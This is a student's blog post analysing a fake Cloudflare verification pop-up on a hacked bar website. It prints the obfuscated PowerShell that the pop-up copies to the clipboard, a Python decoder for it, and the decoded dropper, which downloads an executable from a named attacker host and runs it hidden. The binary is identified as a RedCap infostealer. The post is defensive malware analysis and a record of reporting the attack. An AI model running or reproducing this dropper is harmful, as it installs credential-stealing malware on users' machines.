Tried to Buy a Pint, Finding a Trojan: My First Malware Analysis

blog.michaelrbparker.com · birdculture · 6 days ago · view on HN · research
quality 7/10 · good
0 net
Tags
malware analysis
Tried to buy a pint, Finding a Trojan: My First Malware Analysis | Tea's Blog This story all started with me and some mates wanting to get a drink in one of those cool, trendy hipster places you see online (I promise I'm only 20, apparently that sentence makes me sound old). The site loads for a brief moment and then redirects you to a Cloudflare looking page. You press verify and bam. you get a pop up. This pop up: Then it auto copied something to my clipboard. Now to a no technical folk, I can see them falling for this. I cannot lie for a split second I was wondering if it was real. Me being a Tux follower (Linux user), the script wouldn't have run even if I wanted it to. I moved on trying to continuing to plan my holiday but wondering how this worked kept scratching at my head. So lets take a look at this script. Now I want to stress this point. DO NOT RUN THIS SCRIPT The Obfuscated PowerShell < # I am not a robot - Cloudflare ID : d9141de62779862f # > $ k = 'oFoCAK' ; $ d = '4b281531222f0c7b481812321c320a2e6f050a3241102439192f0c26112406281b0e20250e210a311c715515 0a2034390632161333241b290c2c2d7634151630352e0268212635653c230c3633221b3f3f312e3f0025002f1532 1f2332797b1f03355e717a6f1b7b252c282542160e37296b4b2301357b1f2a0b3f6369103c3f1c372426410f206d 112a1b2e32797b0c0a323d222f2f002b292a2d2e212702266962467d2126366626320a2e616626320a2e15321f23 4f0728390a251b2c33324f6b3f2235234f621b636c0d00340c263d041a32420d3427037d4b257c01002f016e112a 1b2e4f67356b471d3c3a323f0a2b410a0e653f271b2b1c7155010a37132a0122002e0722032321222c2e476f4464 66650a3e0a646662546200287c7b54200031696f067b5f7865224f6b033761784f6b0e2d256b42280037616f002d 54672860446f14373332140f01352e200a6b382623190a371a26323f4f6b3a31286b48610737353b1c7c406c2322 0824003a322803330d6d2232003340223122402f01272433413607337e2a5222036535240423017e27280b225a21 767259200d2574280d735972752f0e710e22207f58715c25237f5f72587470285b7e5d72247f0d7e0b7071785f73 0a27792f09735722737a577e4930332852240e2f2d220a240e2f2d2e1d35002d6f28002b492e2e2f0a7b0c2f2e3e 0b200322332e48614f6e0e3e1b00062f246b4b204f6e14380a040e3028283f271d302825087d0625691f0a351b6e 112a1b2e4f672762146200287c7a1223033024303c320e3135663c2a0a26316b42150a202e250b354f713c360c27 1b2029303c320e3135663c2a0a26316b42150a202e250b354f713c36542f096b6c2500324f6b152e1c324213203f 07664b2568621423172a353654151b22333f42161d2c222e1c354f6e072203233f2235234f6209636c1c06280b2c 36181b3f0326610306220b262f701b341638132e022919266c021b2302636c0706320a3120273f271b2b616f0966 42052e390c234f6e04391d291d02223f062901631222032301372d322c29013728251a231220203f0c2e143e7a6c 54151b22333f42161d2c222e1c354f6e162201220034123f162a0a6309220b220a2d613b00310a3132230a2a0363 6c0a1d211a2e24251b0a0630356b486b212c11390020062f246c4361421428250b29181035320323486f66030622 0b262f6c436142002e260227012766674b281531222f0c7d0a3b283f' ; $ r = '' ; for ( $ p = 0 ; $ p - lt $ d . Length ; $ p += 2 ) {$ r +=[ char ] (( [ convert ]:: ToInt32 ( $ d . Substring ( $ p , 2 ), 16 )) - bxor [ int ][ char ] $ k [ $p/2% $k.Length ] ) } ; & ( [ ScriptBlock ]:: Create ( $ r )) Breaking Down the Decryption Loop Working through the end of the script there is this: $r = '' ; for ( $p = 0 ; $p -lt $d . Length ; $p += 2 ){ $r += [char] (( [convert] :: ToInt32 ( $d . Substring ( $p , 2 ), 16 )) -bxor [int][char] $k [ $p / 2 % $k . Length ])};&( [ScriptBlock] :: Create ( $r )) The code section is a loop that starts at $p = 0 and increments by 2 ( $p += 2 ). It then takes these two characters as its own little string, as we can see here: $d.Substring($p, 2) . Next we take these hex pairs and convert them to integers. We have the key oFoCAK , which is 6 letters long. Earlier, we extracted the text into two letter chunks. So we have to find the right section of the key. This can be done by dividing the index along the string by 2 and then applying the modulo of the length of the key to this index, giving us the letter from the key we want to use. If we were to do it in Python it would look like this: k_char = k[(i // 2) % len(k)] . We can see -bxor , meaning we then apply some maths, more accurately, we XOR the ciphertext with the key letter. (David, if you're reading this, I hope you're proud I remembered something from my cryptography class.) The final step: we turn it back into a string. Now I was not willing to do this all by hand, so I wrote this Python script. k = 'oFoCAK' d = 'THE HEX CODE' r = "" for i in range ( 0 , len ( d ), 2 ): hex_pair = d [ i : i + 2 ] int_val = int ( hex_pair , 16 ) k_char = k [( i // 2 ) % len ( k )] r += chr ( int_val ^ ord ( k_char )) print ( r ) The Decoded Payload NOW I WANT TO STRESS THIS AGAIN. DO NOT. I SAY DO NOT. COPY THIS INTO YOUR TERMINAL (I have also reported this to the bar, Cloudflare, and the domain registrar.) $nzrcdc = '[System.Net.ServicePointManager]::SecurityProtocol=[System.Net.SecurityProtocolType]::Tls12;$t=Join-Path $env:TEMP ([System.IO.Path]::GetRandomFileName());New-Item -ItemType Directory -Path $t -Force|Out-Null;$f=Join-Path $t ([System.IO.Path]::GetRandomFileName()+''.exe'');$ok=0;for($i=0;$i -lt 3 -and -not $ok;$i++){try{Invoke-WebRequest -Uri ''https://bigboysclub.cyou/api/index.php?a=dl&token=fcdd5b796fbf5cb5614da7aaa4773fb404771c4821e4b8d30305ed8df58a2188&src=ballieballerson.com&mode=cloudflare'' -OutFile $f -UseBasicParsing;if(Test-Path $f){$ok=1}else{Start-Sleep -Seconds 2}}catch{Start-Sleep -Seconds 2}};if(-not (Test-Path $f)){exit};Start-Process -FilePath $f -WindowStyle Hidden;try{Remove-Item -LiteralPath $f -Force -ErrorAction SilentlyContinue}catch{};' ; Start-Process -WindowStyle Hidden powershell -ArgumentList '-NoProfile' , '-WindowStyle' , 'Hidden' , '-Command' , $nzrcdc ; exit Now this is quite a lot to take in, so let's restructure it to be easier to read: if ( -not ( Test-Path $f )) { exit } Start-Process -FilePath $f -WindowStyle Hidden ; try { Remove-Item -LiteralPath $f -Force -ErrorAction SilentlyContinue } catch {} '; Start-Process ` -WindowStyle Hidden ` powershell ` -ArgumentList ' -NoProfile ', ' -WindowStyle ', ' Hidden ', ' -Command ' , $nzrcdc ; exit So what does this actually do? We start off by forcing modern TLS, this is just to help ensure the connection does not fail. The power of how windows works its probably not need but ironically the hacker is just being safe. $t = Join-Path $env:TEMP ( [System.IO.Path] :: GetRandomFileName ()); New-Item -ItemType Directory -Path $t -Force | Out-Null ; This creates a random file location to install the executable to. It will be in the format C:\Users\\AppData\Local\Temp\ , so an example would be: C:\Users\TEAMAN\AppData\Local\Temp\213ig4u Once we have the random path we need to create a random file name: $f = Join-Path $t ( [System.IO.Path] :: GetRandomFileName () + ".exe" ); So we could end up with: C:\Users\TEAMAN\AppData\Local\Temp\213ig4uz\i8o76aew.exe This is just to create yet another level of obfuscation. Now these levels of obfuscation is more to stop the OS detecting the Malware instead of the user, by placing it in Temp with a random name and file it should try hide from standard Indicators of Compromise. Legacy antivirus have a history of checking set file paths normally ignoring temp, HOWEVER if you using a anti virus that does this just burn your PC now. The next step is to download the payload that this attacker has tried so hard to hide: $ok = 0 ; for ( $i = 0 ; $i -lt 3 -and -not $ok ; $i ++) { try { Invoke-WebRequest ` -Uri "https://bigboysclub.cyou/api/index.php?a=dl&token=fcdd5b796fbf5cb5614da7aaa4773fb404771c4821e4b8d30305ed8df58a2188&src=ballieballerson.com&mode=cloudflare" ` -OutFile $f ` -UseBasicParsing ; if ( Test-Path $f ) { $ok = 1 } else { Start-Sleep -Seconds 2 } } catch { Start-Sleep -Seconds 2 } } The attacker created an integer flag here called $ok , which acts as a boolean to check whether the binary has been downloaded from bigboysclub.cyou (just the domain name gives me the ick). Next there's a for loop with a try-catch statement that attempts to download the file up to 3 times. If the file fails to download, the script exits without a trace. If the download is successful, Start-Process -FilePath $f -WindowStyle Hidden; is called. This runs the malicious binary that has just been installed in a hidden window, meaning the victim cannot see it running. Once the file starts to run, the malicious script then runs: Remove-Item -LiteralPath $f -Force -ErrorAction SilentlyContinue This removes both the temporary directory and the downloaded file from the machine, while keeping the newly installed binary running in memory. The file being removed when the script than made me assume that it was just a installer for another bit of Malware that would run on the system thought at 2mb it would have incredibly heavily obfuscated as a installer or incredibly poorly written. We will find out shortly, I was wrong. Reverse Engineering the Binary So the next job was working out why, how, or what this binary does. I really had no idea where to start, so after a bit of googling I found out about something called REMnux. Starting off with an app called Cutter, it became clear that the Trojan was written in Go. I couldn't get any further with Cutter (that's a user issue more than anything), so I moved to Ghidra with the Go extension. There was a lot of gibberish I did not fully understand, but looking at the libraries that were being imported it was definitely designed to make requests to an outside network. I spent probably another hour or two messing around with hex data (again, I had never attempted to reverse engineer or analyse malware before this) before I decided the best thing to do would be to run it and monitor the network traffic. Identifying the Malware I started off looking for Windows monitoring tools and came across a site called Hybrid Analysis, which did a lot of the heavy lifting here. Once the binary was uploaded, it was identified as a Redcap infostealer Trojan 1 using ChaCha20 to encrypt traffic and send it to the attacker's server (the IP will not be mentioned here), while spoofing its user agent as a macOS Firefox user agent. Odd considering this was a Windows VM with Firefox not installed. I'm assuming this is to help blend the traffic in and avoid antivirus detection. It was also running an infostealer that was trying to access the standard format of cookies and passwords for both Chrome and Firefox, as well as attempting to change local proxy settings to capture future network traffic, and creating a persistence layer for when the binary gets removed at the end of the PowerShell script mentioned earlier. Finally, it tried and failed at spoofing a certificate pretending to be Postman. In theory this would help Windows trust the binary and make it less likely to be blocked; however, in this case the certificate was invalid and corrupted. Reporting and Takedown Being the good little programmer I am I was filling out abuse forms throughout this process. When we first found the domain bigboysclub.cyou it was reported to both Cloudflare and the domain registrar. Halfway through writing this, about three hours later, I went to grab some screenshots only to find that Cloudflare had already removed all the redirects (A email saying something had happened would be nice, but i guess ill let them slide this time). The VPS was reported to Hetzner and I'll add an edit if I get a response. Final Thoughts I have never done any form of reverse engineering before or looking behind the curtain and its exciting as well as interesting. If anyone has any suggestions about how you would have done this or some resources on reverse engineering please send a message on the discord. (Also as that website been hacked iv never got to book a table at a bar. If you got any fun drinking spots in London also send me a message, im running out of ideas,) If you enjoyed the blog or want to continue the discussion, check out the Discord . To get updates about future articles, feel free to follow the RSS feed . And if you feel like buying this university student a cup of tea, check out the Buy Me a Coffee icon in the bottom right. RedCap is a malware family categorized as a backdoor and information stealer, which threat actors use to harvest credentials and compromise systems, particularly by targeting Microsoft Exchange Servers. ↩ ← Back to Blog
← Back to stories